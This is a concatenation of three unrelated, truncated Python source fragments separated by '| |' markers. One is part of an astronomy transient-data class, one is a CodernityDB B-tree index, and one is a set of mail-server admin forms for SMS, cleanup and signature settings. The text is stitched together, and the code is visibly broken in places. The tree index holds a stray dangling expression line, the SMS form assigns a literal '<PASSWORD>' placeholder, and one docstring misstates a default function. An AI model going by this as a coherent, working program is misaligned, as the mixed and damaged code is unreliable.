:param flux_err: Flux error values.
:type flux_err: np.ndarray, optional
:param flux_density: Flux density values.
:type flux_density: np.ndarray, optional
:param flux_density_err: Flux density error values.
:type flux_density_err: np.ndarray, optional
:param magnitude: Magnitude values for photometry data.
:type magnitude: np.ndarray, optional
:param magnitude_err: Magnitude error values for photometry data.
:type magnitude_err: np.ndarray, optional
:param counts: Counts for prompt data.
:type counts: np.ndarray, optional
:param ttes: Time-tagged events data for unbinned prompt data.
:type ttes: np.ndarray, optional
:param bin_size: Bin size for binning time-tagged event data.
:type bin_size: float, optional
:param redshift: Redshift value.
:type redshift: float, optional
:param data_mode: Data mode. Must be one from `Transient.DATA_MODES`.
:type data_mode: str, optional
:param name: Name of the transient.
:type name: str, optional
:param photon_index: Photon index value.
:type photon_index: float, optional
:param use_phase_model: Whether we are using a phase model.
:type use_phase_model: bool, optional
:param frequency: Array of band frequencies in photometry data.
:type frequency: np.ndarray, optional
:param system: System values.
:type system: np.ndarray, optional
:param bands: Band values.
:type bands: np.ndarray, optional
:param active_bands: List or array of active bands to be used in the analysis.
Use all available bands if 'all' is given.
:type active_bands: Union[list, np.ndarray], optional
:param kwargs: Additional callables:
bands_to_frequency: Conversion function to convert a list of bands to frequencies.
Use redback.utils.bands_to_frequency if not given.
bin_ttes: Binning function for time-tagged event data.
Use redback.utils.bands_to_frequency if not given.
:type kwargs: None, optional
"""
self.bin_size = bin_size
self.bin_ttes = kwargs.get("bin_ttes", redback.utils.bin_ttes)
self.bands_to_frequency = kwargs.get("bands_to_frequency", redback.utils.bands_to_frequency)
if data_mode == 'ttes':
time, counts = self.bin_ttes(ttes, self.bin_size)
self.time = time
self.time_err = time_err
self.time_mjd = time_mjd
self.time_mjd_err = time_mjd_err
self.time_rest_frame = time_rest_frame
self.time_rest_frame_err = time_rest_frame_err
self.Lum50 = Lum50
self.Lum50_err = Lum50_err
self.flux = flux
self.flux_err = flux_err
self.flux_density = flux_density
self.flux_density_err = flux_density_err
self.magnitude = magnitude
self.magnitude_err = magnitude_err
self.counts = counts
self.counts_err = np.sqrt(counts) if counts is not None else None
self.ttes = ttes
self._frequency = None
self._bands = None
self.set_bands_and_frequency(bands=bands, frequency=frequency)
self.system = system
self.active_bands = active_bands
self.data_mode = data_mode
self.redshift = redshift
self.name = name
self.use_phase_model = use_phase_model
self.meta_data = None
self.photon_index = photon_index
self.directory_structure = redback.get_data.directory.DirectoryStructure(
directory_path=".", raw_file_path=".", processed_file_path=".")
@staticmethod
def load_data_generic(processed_file_path, data_mode="magnitude"):
"""Loads data from specified directory and file, and returns it as a tuple.
:param processed_file_path: Path to the processed file to load
:type processed_file_path: str
:param data_mode: Name of the data mode.
Must be from ['magnitude', 'flux_density', 'all']. Default is magnitude.
:type data_mode: str, optional
:return: Six elements when querying magnitude or flux_density data, Eight for 'all'.
:rtype: tuple
"""
df = pd.read_csv(processed_file_path)
time_days = np.array(df["time (days)"])
time_mjd = np.array(df["time"])
magnitude = np.array(df["magnitude"])
magnitude_err = np.array(df["e_magnitude"])
bands = np.array(df["band"])
flux_density = np.array(df["flux_density(mjy)"])
flux_density_err = np.array(df["flux_density_error"])
if data_mode == "magnitude":
return time_days, time_mjd, magnitude, magnitude_err, bands
elif data_mode == "flux_density":
return time_days, time_mjd, flux_density, flux_density_err, bands
elif data_mode == "all":
return time_days, time_mjd, flux_density, flux_density_err, magnitude, magnitude_err, bands
@classmethod
def from_lasair_data(
cls, name: str, data_mode: str = "magnitude", active_bands: Union[np.ndarray, str] = 'all',
use_phase_model: bool = False) -> Transient:
"""Constructor method to built object from Open Access Catalogue.
:param name: Name of the transient.
:type name: str
:param data_mode: Data mode used. Must be from `OpticalTransient.DATA_MODES`. Default is magnitude.
:type data_mode: str, optional
:param active_bands: Sets active bands based on array given.
If argument is 'all', all unique bands in `self.bands` will be used.
:type active_bands: Union[np.ndarray, str]
:param use_phase_model: Whether to use a phase model.
:type use_phase_model: bool, optional
:return: A class instance.
:rtype: OpticalTransient
"""
if cls.__name__ == "TDE":
transient_type = "tidal_disruption_event"
else:
transient_type = cls.__name__.lower()
directory_structure = redback.get_data.directory.lasair_directory_structure(
transient=name, transient_type=transient_type)
df = pd.read_csv(directory_structure.processed_file_path)
time_days = np.array(df["time (days)"])
time_mjd = np.array(df["time"])
magnitude = np.array(df["magnitude"])
magnitude_err = np.array(df["e_magnitude"])
bands = np.array(df["band"])
flux_density = np.array(df["flux_density(mjy)"])
flux_density_err = np.array(df["flux_density_error"])
return cls(name=name, data_mode=data_mode, time=time_days, time_err=None, time_mjd=time_mjd,
flux_density=flux_density, flux_density_err=flux_density_err, magnitude=magnitude,
magnitude_err=magnitude_err, bands=bands, active_bands=active_bands,
use_phase_model=use_phase_model)
@property
def _time_attribute_name(self) -> str:
if self.luminosity_data:
return "time_rest_frame"
elif self.use_phase_model:
return "time_mjd"
return "time"
@property
def _time_err_attribute_name(self) -> str:
return self._time_attribute_name + "_err"
@property
def _y_attribute_name(self) -> str:
return self._ATTRIBUTE_NAME_DICT[self.data_mode]
@property
def _y_err_attribute_name(self) -> str:
return self._ATTRIBUTE_NAME_DICT[self.data_mode] + "_err"
@property
def x(self) -> np.ndarray:
"""
:return: The time values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._time_attribute_name)
@x.setter
def x(self, x: np.ndarray) -> None:
"""Sets the time values for the active data mode.
:param x: The desired time values.
:type x: np.ndarray
"""
setattr(self, self._time_attribute_name, x)
@property
def x_err(self) -> np.ndarray:
"""
:return: The time error values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._time_err_attribute_name)
@x_err.setter
def x_err(self, x_err: np.ndarray) -> None:
"""Sets the time error values for the active data mode.
:param x_err: The desired time error values.
:type x_err: np.ndarray
"""
setattr(self, self._time_err_attribute_name, x_err)
@property
def y(self) -> np.ndarray:
"""
:return: The y values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._y_attribute_name)
@y.setter
def y(self, y: np.ndarray) -> None:
"""Sets the y values for the active data mode.
:param y: The desired y values.
:type y: np.ndarray
"""
setattr(self, self._y_attribute_name, y)
@property
def y_err(self) -> np.ndarray:
"""
:return: The y error values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._y_err_attribute_name)
@y_err.setter
def y_err(self, y_err: np.ndarray) -> None:
"""Sets the y error values for the active data mode.
:param y_err: The desired y error values.
:type y_err: np.ndarray
"""
setattr(self, self._y_err_attribute_name, y_err)
@property
def data_mode(self) -> str:
"""
:return: The currently active data mode (one in `Transient.DATA_MODES`).
:rtype: str
"""
return self._data_mode
@data_mode.setter
def data_mode(self, data_mode: str) -> None:
"""
:param data_mode: One of the data modes in `Transient.DATA_MODES`.
:type data_mode: str
"""
if data_mode in self.DATA_MODES or data_mode is None:
self._data_mode = data_mode
else:
raise ValueError("Unknown data mode.")
@property
def xlabel(self) -> str:
"""
:return: xlabel used in plotting functions
:rtype: | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011-2013 Codernity (http://codernity.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from index import Index, IndexException, DocIdNotFound, ElemNotFound
import struct
import marshal
import os
import io
import shutil
from storage import IU_Storage
# from ipdb import set_trace
from CodernityDB.env import cdb_environment
from CodernityDB.index import TryReindexException
if cdb_environment.get('rlock_obj'):
from CodernityDB import patch
patch.patch_cache_rr(cdb_environment['rlock_obj'])
from CodernityDB.rr_cache import cache1lvl, cache2lvl
tree_buffer_size = io.DEFAULT_BUFFER_SIZE
cdb_environment['tree_buffer_size'] = tree_buffer_size
MODE_FIRST = 0
MODE_LAST = 1
MOVE_BUFFER_PREV = 0
MOVE_BUFFER_NEXT = 1
class NodeCapacityException(IndexException):
pass
class IU_TreeBasedIndex(Index):
custom_header = 'from CodernityDB.tree_index import TreeBasedIndex'
def __init__(self, db_path, name, key_format='32s', pointer_format='I',
meta_format='32sIIc', node_capacity=10, storage_class=None):
if node_capacity < 3:
raise NodeCapacityException
super(IU_TreeBasedIndex, self).__init__(db_path, name)
self.data_start = self._start_ind + 1
self.node_capacity = node_capacity
self.flag_format = 'c'
self.elements_counter_format = 'h'
self.pointer_format = pointer_format
self.key_format = key_format
self.meta_format = meta_format
self._count_props()
if not storage_class:
storage_class = IU_Storage
if storage_class and not isinstance(storage_class, basestring):
storage_class = storage_class.__name__
self.storage_class = storage_class
self.storage = None
cache = cache1lvl(100)
twolvl_cache = cache2lvl(150)
self._find_key = cache(self._find_key)
self._match_doc_id = cache(self._match_doc_id)
# self._read_single_leaf_record =
# twolvl_cache(self._read_single_leaf_record)
self._find_key_in_leaf = twolvl_cache(self._find_key_in_leaf)
self._read_single_node_key = twolvl_cache(self._read_single_node_key)
self._find_first_key_occurence_in_node = twolvl_cache(
self._find_first_key_occurence_in_node)
self._find_last_key_occurence_in_node = twolvl_cache(
self._find_last_key_occurence_in_node)
self._read_leaf_nr_of_elements = cache(self._read_leaf_nr_of_elements)
self._read_leaf_neighbours = cache(self._read_leaf_neighbours)
self._read_leaf_nr_of_elements_and_neighbours = cache(
self._read_leaf_nr_of_elements_and_neighbours)
self._read_node_nr_of_elements_and_children_flag = cache(
self._read_node_nr_of_elements_and_children_flag)
def _count_props(self):
"""
Counts dynamic properties for tree, such as all complex formats
"""
self.single_leaf_record_format = self.key_format + self.meta_format
self.single_node_record_format = self.pointer_format + \
self.key_format + self.pointer_format
self.node_format = self.elements_counter_format + self.flag_format\
+ self.pointer_format + (self.key_format +
self.pointer_format) * self.node_capacity
self.leaf_format = self.elements_counter_format + self.pointer_format * 2\
+ (self.single_leaf_record_format) * self.node_capacity
self.leaf_heading_format = self.elements_counter_format + \
self.pointer_format * 2
self.node_heading_format = self.elements_counter_format + \
self.flag_format
self.key_size = struct.calcsize('<' + self.key_format)
self.meta_size = struct.calcsize('<' + self.meta_format)
self.single_leaf_record_size = struct.calcsize('<' + self.
single_leaf_record_format)
self.single_node_record_size = struct.calcsize('<' + self.
single_node_record_format)
self.node_size = struct.calcsize('<' + self.node_format)
self.leaf_size = struct.calcsize('<' + self.leaf_format)
self.flag_size = struct.calcsize('<' + self.flag_format)
self.elements_counter_size = struct.calcsize('<' + self.
elements_counter_format)
self.pointer_size = struct.calcsize('<' + self.pointer_format)
self.leaf_heading_size = struct.calcsize(
'<' + self.leaf_heading_format)
self.node_heading_size = struct.calcsize(
'<' + self.node_heading_format)
def create_index(self):
if os.path.isfile(os.path.join(self.db_path, self.name + '_buck')):
raise IndexException('Already exists')
with io.open(os.path.join(self.db_path, self.name + "_buck"), 'w+b') as f:
props = dict(name=self.name,
flag_format=self.flag_format,
pointer_format=self.pointer_format,
elements_counter_format=self.elements_counter_format,
node_capacity=self.node_capacity,
key_format=self.key_format,
meta_format=self.meta_format,
version=self.__version__,
storage_class=self.storage_class)
f.write(marshal.dumps(props))
self.buckets = io.open(os.path.join(self.db_path, self.name +
"_buck"), 'r+b', buffering=0)
self._create_storage()
self.buckets.seek(self._start_ind)
self.buckets.write(struct.pack('<c', 'l'))
self._insert_empty_root()
self.root_flag = 'l'
def destroy(self):
super(IU_TreeBasedIndex, self).destroy()
self._clear_cache()
def open_index(self):
if not os.path.isfile(os.path.join(self.db_path, self.name + '_buck')):
raise IndexException("Doesn't exists")
self.buckets = io.open(
os.path.join(self.db_path, self.name + "_buck"), 'r+b', buffering=0)
self.buckets.seek(self._start_ind)
self.root_flag = struct.unpack('<c', self.buckets.read(1))[0]
self._fix_params()
self._open_storage()
def _insert_empty_root(self):
self.buckets.seek(self.data_start)
root = struct.pack('<' + self.leaf_heading_format,
0,
0,
0)
root += self.single_leaf_record_size * self.node_capacity * '\x00'
self.buckets.write(root)
self.flush()
def insert(self, doc_id, key, start, size, status='o'):
nodes_stack, indexes = self._find_leaf_to_insert(key)
self._insert_new_record_into_leaf(nodes_stack.pop(),
key,
doc_id,
start,
size,
status,
nodes_stack,
indexes)
self._match_doc_id.delete(doc_id)
def _read_leaf_nr_of_elements_and_neighbours(self, leaf_start):
self.buckets.seek(leaf_start)
data = self.buckets.read(
self.elements_counter_size + 2 * self.pointer_size)
nr_of_elements, prev_l, next_l = struct.unpack(
'<' + self.elements_counter_format + 2 * self.pointer_format,
data)
return nr_of_elements, prev_l, next_l
def _read_node_nr_of_elements_and_children_flag(self, start):
self.buckets.seek(start)
data = self.buckets.read(self.elements_counter_size + self.flag_size)
nr_of_elements, children_flag = struct.unpack(
'<' + self.elements_counter_format + self.flag_format,
data)
return nr_of_elements, children_flag
def _read_leaf_nr_of_elements(self, start):
self.buckets.seek(start)
data = self.buckets.read(self.elements_counter_size)
nr_of_elements = struct.unpack(
'<' + self.elements_counter_format, data)
return nr_of_elements[0]
def _read_single_node_key(self, node_start, key_index):
self.buckets.seek(self._calculate_key_position(
node_start, key_index, 'n'))
data = self.buckets.read(self.single_node_record_size)
flag_left, key, pointer_right = struct.unpack(
'<' + self.single_node_record_format, data)
return flag_left, key, pointer_right
def _read_single_leaf_record(self, leaf_start, key_index):
self.buckets.seek(self._calculate_key_position(
leaf_start, key_index, 'l'))
data = self.buckets.read(self.single_leaf_record_size)
key, doc_id, start, size, status = struct.unpack('<' + self.
single_leaf_record_format, data)
return key, doc_id, start, size, status
def _calculate_key_position(self, start, key_index, flag):
"""
Calculates position of key in buckets file
"""
if flag == 'l':
return start + self.leaf_heading_size + key_index * self.single_leaf_record_size
elif flag == 'n':
# returns start position of flag before key[key_index]
return start + self.node_heading_size + key_index * (self.pointer_size + self.key_size)
def _match_doc_id(self, doc_id, key, element_index, leaf_start, nr_of_elements):
curr_key_index = element_index + 1
curr_leaf_start = leaf_start
next_leaf = self._read_leaf_neighbours(leaf_start)[1]
while True:
if curr_key_index < nr_of_elements:
curr_key, curr_doc_id, curr_start, curr_size,\
curr_status = self._read_single_leaf_record(
curr_leaf_start, curr_key_index)
if key != curr_key:
# should't happen, crashes earlier on id index
raise DocIdNotFound
elif doc_id == curr_doc_id and curr_status != 'd':
return curr_leaf_start, nr_of_elements, curr_key_index
else:
curr_key_index = curr_key_index + 1
else: # there are no more elements in current leaf, must jump to next
if not next_leaf: # end of leaf linked list
# should't happen, crashes earlier on id index
raise DocIdNotFound
else:
curr_leaf_start = next_leaf
nr_of_elements, prev_leaf, next_leaf = self._read_leaf_nr_of_elements_and_neighbours(next_leaf)
curr_key_index = 0
def _find_existing(self, key, element_index, leaf_start, nr_of_elements):
curr_key_index = element_index + 1
curr_leaf_start = leaf_start
next_leaf = self._read_leaf_neighbours(leaf_start)[1]
while True:
if curr_key_index < nr_of_elements:
curr_key, curr_doc_id, curr_start, curr_size,\
curr_status = self._read_single_leaf_record(
curr_leaf_start, curr_key_index)
if key != curr_key:
raise ElemNotFound
elif curr_status != 'd':
return curr_leaf_start, nr_of_elements, curr_key_index
else:
curr_key_index = curr_key_index + 1
else: # there are no more elements in current leaf, must jump to next
if not next_leaf: # end of leaf linked list
raise ElemNotFound
else:
curr_leaf_start = next_leaf
nr_of_elements, prev_leaf, next_leaf = self._read_leaf_nr_of_elements_and_neighbours(next_leaf)
curr_key_index = 0
def _update_element(self, leaf_start, key_index, new_data):
self.buckets.seek(self._calculate_key_position(leaf_start, key_index, 'l')
+ self.key_size)
self.buckets.write(struct.pack('<' + self.meta_format,
*new_data))
# self._read_single_leaf_record.delete(leaf_start_position, key_index)
def _delete_element(self, leaf_start, key_index):
self.buckets.seek(self._calculate_key_position(leaf_start, key_index, 'l')
+ self.single_leaf_record_size - 1)
self.buckets.write(struct.pack('<c', 'd'))
# self._read_single_leaf_record.delete(leaf_start_position, key_index)
def _leaf_linear_key_search(self, key, start, start_index, end_index):
self.buckets.seek(start)
data = self.buckets.read(
(end_index - start_index + 1) * self.single_leaf_record_size)
curr_key = struct.unpack(
'<' + self.key_format, data[:self.key_size])[0]
data = data[self.single_leaf_record_size:]
curr_index = 0
while curr_key != key:
curr_index += 1
curr_key = struct.unpack(
'<' + self.key_format, data[:self.key_size])[0]
data = data[self.single_leaf_record_size:]
return start_index + curr_index
def _node_linear_key_search(self, key, start, start_index, end_index):
self.buckets.seek(start + self.pointer_size)
data = self.buckets.read((end_index - start_index + 1) * (
self.key_size + self.pointer_size))
curr_key = struct.unpack(
'<' + self.key_format, data[:self.key_size])[0]
data = data[self.key_size + self.pointer_size:]
curr_index = 0
while curr_key != key:
curr_index += 1
curr_key = struct.unpack(
'<' + self.key_format, data[:self.key_size])[0]
data = data[self.key_size + self.pointer_size:]
return start_index + curr_index
def _next_buffer(self, buffer_start, buffer_end):
return buffer_end, buffer_end + tree_buffer_size
def _prev_buffer(self, buffer_start, buffer_end):
return buffer_start - tree_buffer_size, buffer_start
def _choose_next_candidate_index_in_leaf(self, leaf_start, candidate_start, buffer_start, buffer_end, imin, imax):
if buffer_start > candidate_start:
move_buffer = MOVE_BUFFER_PREV
elif buffer_end < candidate_start + self.single_leaf_record_size:
move_buffer = MOVE_BUFFER_NEXT
else:
move_buffer = None
return self._calculate_key_position(leaf_start, (imin + imax) / 2, 'l'), (imin + imax) / 2, move_buffer
def _choose_next_candidate_index_in_node(self, node_start, candidate_start, buffer_start, buffer_end, imin, imax):
if buffer_start > candidate_start:
move_buffer = MOVE_BUFFER_PREV
elif buffer_end < candidate_start + self.single_node_record_size:
(self.pointer_size + self.key_size) - 1
move_buffer = MOVE_BUFFER_NEXT
else:
move_buffer = None
return self._calculate_key_position(node_start, (imin + imax) / 2, 'n'), (imin + imax) / 2, move_buffer
def _find_key_in_leaf(self, leaf_start, key, nr_of_elements):
if nr_of_elements == 1:
return self._find_key_in_leaf_with_one_element(key, leaf_start)[-5:]
else:
return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements)[-5:]
def _find_key_in_leaf_for_update(self, key, doc_id, leaf_start, nr_of_elements):
if nr_of_elements == 1:
return self._find_key_in_leaf_with_one_element(key, leaf_start, doc_id=doc_id)
else:
return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_FIRST, doc_id=doc_id)
def _find_index_of_first_key_equal_or_smaller_key(self, key, leaf_start, nr_of_elements):
if nr_of_elements == 1:
return self._find_key_in_leaf_with_one_element(key, leaf_start, mode=MODE_FIRST, return_closest=True)[:2]
else:
return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_FIRST, return_closest=True)[:2]
def _find_index_of_last_key_equal_or_smaller_key(self, key, leaf_start, nr_of_elements):
if nr_of_elements == 1:
return self._find_key_in_leaf_with_one_element(key, leaf_start, mode=MODE_LAST, return_closest=True)[:2]
else:
return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_LAST, return_closest=True)[:2]
def _find_index_of_first_key_equal(self, key, leaf_start, nr_of_elements):
if nr_of_elements == 1:
return self._find_key_in_leaf_with_one_element(key, leaf_start, mode=MODE_FIRST)[:2]
else:
return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_FIRST)[:2]
def _find_key_in_leaf_with_one_element(self, key, leaf_start, doc_id=None, mode=None, return_closest=False):
curr_key, curr_doc_id, curr_start, curr_size,\
curr_status = self._read_single_leaf_record(leaf_start, 0)
if key != curr_key:
if return_closest and curr_status != 'd':
return leaf_start, 0
else:
raise ElemNotFound
else:
if curr_status == 'd':
raise ElemNotFound
elif doc_id is not None and doc_id != curr_doc_id:
# should't happen, crashes earlier on id index
raise DocIdNotFound
else:
return leaf_start, 0, curr_doc_id, curr_key, curr_start, curr_size, curr_status
def _find_key_in_leaf_using_binary_search(self, key, leaf_start, nr_of_elements, doc_id=None, mode=None, return_closest=False):
"""
Binary search implementation used | |
def save(self):
self.paramSave()
#兼容PHP那边旧版本的强密码规则开关
#关闭PHP的开关
DomainAttr.saveAttrObjValue(
domain_id=self.domain_id.value,
type=u"webmail",
item="sw_pass_severe",
value="-1"
)
#使用超管这边的开关
DomainAttr.saveAttrObjValue(
domain_id=self.domain_id.value,
type=u"webmail",
item="sw_pass_severe_new",
value="1"
)
#第三方对接
class DomainSysInterfaceForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SYS_INTERFACE_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SYS_INTERFACE_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SYS_INTERFACE_TYPE)
def initPostParams(self):
self.initPostParamsDefaultDisable()
class DomainSysInterfaceAuthApiForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SYS_INTERFACE_AUTH_API_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SYS_INTERFACE_AUTH_API_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SYS_INTERFACE_AUTH_API_TYPE)
class DomainSysInterfaceIMApiForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SYS_INTERFACE_IM_API_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SYS_INTERFACE_IM_API_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SYS_INTERFACE_IM_API_TYPE)
#杂项设置
class DomainSysOthersForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SYS_OTHERS_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SYS_OTHERS_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SYS_OTHERS_TYPE)
SMSServiceList = (
(u'jiutian', _(u'短信通道一(九天)')),
(u'zhutong', _(u'短信通道二(助通)')),
)
@property
def get_sms_list(self):
return self.SMSServiceList
def initPostParams(self):
self.initPostParamsDefaultDisable()
data = self.post if self.post else self.get
#短信服务器配置
confSms = DomainAttr.objects.filter(domain_id=self.domain_id.value,type="system",item="cf_sms_conf").first()
dataSms = "{}" if not confSms else confSms.value
try:
jsonSms = json.loads(dataSms)
jsonSms = {} if not isinstance(jsonSms, dict) else jsonSms
except:
jsonSms = {}
self.sms_type = jsonSms.get(u"type", u"")
self.sms_account = jsonSms.get(u"account", u"")
self.sms_password = jsonSms.get(u"password", u"")
self.sms_sign = jsonSms.get(u"sign", u"")
if "sms_type" in data:
self.sms_type = data["sms_type"]
if "sms_account" in data:
self.sms_account = data["sms_account"]
if "sms_password" in data:
self.sms_password = data["sms_password"]
if "sms_sign" in data:
self.sms_sign = data["sms_sign"]
jsonSms["type"] = self.sms_type
jsonSms["account"] = self.sms_account
jsonSms["password"] = <PASSWORD>
jsonSms["sign"] = self.sms_sign
self.cf_sms_conf = BaseFied(value=json.dumps(jsonSms), error=None)
self.sms_cost = None
try:
if self.request.user.licence_validsms and (self.sms_account and self.sms_password):
from lib import sms_interface
self.sms_cost = sms_interface.query_sms_cost(self.sms_type, self.sms_account, self.sms_password)
except Exception,err:
print err
def save(self):
super(DomainSysOthersForm, self).save()
#旧版本的短信开关是保存在域名上的
Domain.objects.filter(id=self.domain_id.value).update(
recvsms=self.sw_recvsms.value,
sendsms=self.sw_sendsms.value,
)
class DomainSysOthersCleanForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SYS_OTHERS_SPACE_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SYS_OTHERS_SPACE_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SYS_OTHERS_SPACE_TYPE)
def initialize(self):
self.initBasicParams()
newData = self.post if self.post else self.get
if "domain_id" in newData:
self.domain_id = BaseFied(value=newData["domain_id"], error=None)
try:
oldCleanData = json.loads(self.cf_spaceclean.value)
except:
oldCleanData = {}
try:
oldMailData = json.loads(self.cf_spacemail.value)
except:
oldMailData = {}
oldCleanData = {} if not isinstance(oldCleanData, dict) else oldCleanData
oldMailData = {} if not isinstance(oldMailData, dict) else oldMailData
self.general_keep_time = get_unicode(oldCleanData.get(u"general_keep_time", u"0"))
self.sent_keep_time = get_unicode(oldCleanData.get(u"sent_keep_time", u"0"))
self.spam_keep_time = get_unicode(oldCleanData.get(u"spam_keep_time", u"0"))
self.trash_keep_time = get_unicode(oldCleanData.get(u"trash_keep_time", u"0"))
self.subject = oldMailData.get(u"subject", u"").strip()
self.content = oldMailData.get(u"content", u"")
self.warn_rate=get_unicode(oldMailData.get(u"warn_rate", u"85"))
if newData:
self.general_keep_time = get_unicode(newData.get(u"general_keep_time", u"0"))
self.sent_keep_time = get_unicode(newData.get(u"sent_keep_time", u"0"))
self.spam_keep_time = get_unicode(newData.get(u"spam_keep_time", u"0"))
self.trash_keep_time = get_unicode(newData.get(u"trash_keep_time", u"0"))
self.subject = newData.get(u"subject", u"").strip()
self.content = newData.get(u"content", u"")
self.warn_rate=get_unicode(newData.get(u"warn_rate", u"85"))
saveCleanData = {
u"general_keep_time" : self.general_keep_time,
u"sent_keep_time" : self.sent_keep_time,
u"spam_keep_time" : self.spam_keep_time,
u"trash_keep_time" : self.trash_keep_time,
}
saveMailData = {
u"subject" : self.subject,
u"content" : self.content,
u"warn_rate" : self.warn_rate,
}
self.cf_spaceclean = BaseFied(value=json.dumps(saveCleanData), error=None)
self.cf_spacemail = BaseFied(value=json.dumps(saveMailData), error=None)
class DomainSysOthersAttachForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SYS_OTHERS_ATTACH_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SYS_OTHERS_ATTACH_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SYS_OTHERS_ATTACH_TYPE)
def initialize(self):
self.initBasicParams()
newData = self.post if self.post else self.get
if "domain_id" in newData:
self.domain_id = BaseFied(value=newData["domain_id"], error=None)
try:
oldData = json.loads(self.cf_online_attach.value)
except:
oldData = {}
#这里的设置,在数据库没数据时要初始化数据库,不然app那边会读取错误
autoSave = False
#这个是2.2.58以后不再使用的值,在该版本以前是 所有类型邮件的 “转存大小”
#在2.2.58后因为转存的邮件区分出了类型,所以这个值改为默认值
self.client_size_default = oldData.get("size", "50")
self.client_url = oldData.get("url", "")
self.client_public = oldData.get("public", "-1")
self.client_size_list = oldData.get("size_list", self.client_size_default)
self.client_size_in = oldData.get("size_in", self.client_size_default)
self.client_size_out = oldData.get("size_out", self.client_size_default)
#从系统设置中读取下载地址的默认值
if not self.client_url.strip():
obj = DomainAttr.objects.filter(domain_id=0,type=u'system',item=u'view_webmail_url').first()
self.client_url = obj.value if obj else ""
#系统设置没有配置时就读取默认值
if not self.client_url.strip() and self.request:
self.client_url = get_client_request(self.request)
autoSave = True
if newData:
self.client_size_list = newData.get("client_size_list", self.client_size_default)
self.client_size_in = newData.get("client_size_in", self.client_size_default)
self.client_size_out = newData.get("client_size_out", self.client_size_default)
self.client_url = newData.get("client_url", "")
self.client_public = newData.get("client_public", "-1")
saveData = {
u"url" : self.client_url,
u"size" : self.client_size_default,
u"size_list" : self.client_size_list,
u"size_in" : self.client_size_in,
u"size_out" : self.client_size_out,
u"public" : self.client_public,
}
self.cf_online_attach = BaseFied(value=json.dumps(saveData), error=None)
if autoSave:
self.paramSave()
class DomainSignDomainForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SIGN_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SIGN_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SIGN_TYPE)
def initialize(self):
self.initBasicParams()
newData = self.post if self.post else self.get
if "domain_id" in newData:
self.domain_id = BaseFied(value=newData["domain_id"], error=None)
try:
oldData = json.loads(self.cf_domain_signature.value)
except:
oldData = {}
oldData = {} if not isinstance(oldData, dict) else oldData
self.content_html = oldData.get(u"html",u"")
if self.content_html and u"new" in oldData:
self.content_html = base64.decodestring(self.content_html)
self.content_text = oldData.get(u"text",u"")
if newData:
self.content_html = newData.get(u"content_html", u"")
self.content_text = newData.get(u"content_text", u"-1")
sw_domain_signature = newData.get("sw_domain_signature", "-1")
self.sw_domain_signature = BaseFied(value=sw_domain_signature, error=None)
saveData = {
u"html" : get_unicode(base64.encodestring(get_string(self.content_html))),
u"text" : self.content_text,
u"new" : u"1", #针对老版本的兼容标记
}
self.cf_domain_signature = BaseFied(value=json.dumps(saveData), error=None)
class DomainSignPersonalForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SIGN_PERSONAL_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SIGN_PERSONAL_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SIGN_PERSONAL_TYPE)
PARAM_LIST_DEFAULT = dict(constants.DOMAIN_SIGN_PERSONAL_VALUE_DEFAULT)
def initialize(self):
self.initBasicParams()
newData = self.post if self.post else self.get
if "domain_id" in newData:
self.domain_id = BaseFied(value=newData["domain_id"], error=None)
try:
oldData = json.loads(self.cf_personal_sign.value)
except:
oldData = {}
oldData = {} if not isinstance(oldData, dict) else oldData
for name, default in self.PARAM_LIST_DEFAULT.items():
setattr(self, name, oldData.get(name, default) )
if self.personal_sign_templ:
self.personal_sign_templ = get_unicode(base64.decodestring(get_string(self.personal_sign_templ)))
if newData:
self.personal_sign_new = get_unicode(newData.get(u"personal_sign_new", u"-1"))
self.personal_sign_forward = get_unicode(newData.get(u"personal_sign_forward", u"-1"))
self.personal_sign_auto = get_unicode(newData.get(u"personal_sign_auto", u"-1"))
self.personal_sign_templ = get_unicode(newData.get(u"content_html", u""))
saveData = {
u"personal_sign_new" : self.personal_sign_new,
u"personal_sign_forward" : self.personal_sign_forward,
u"personal_sign_auto" : self.personal_sign_auto,
u"personal_sign_templ" : get_unicode(base64.encodestring(get_string(self.personal_sign_templ))),
}
self.cf_personal_sign = BaseFied(value=json.dumps(saveData), error=None)
try:
import HTMLParser
html_parser = HTMLParser.HTMLParser()
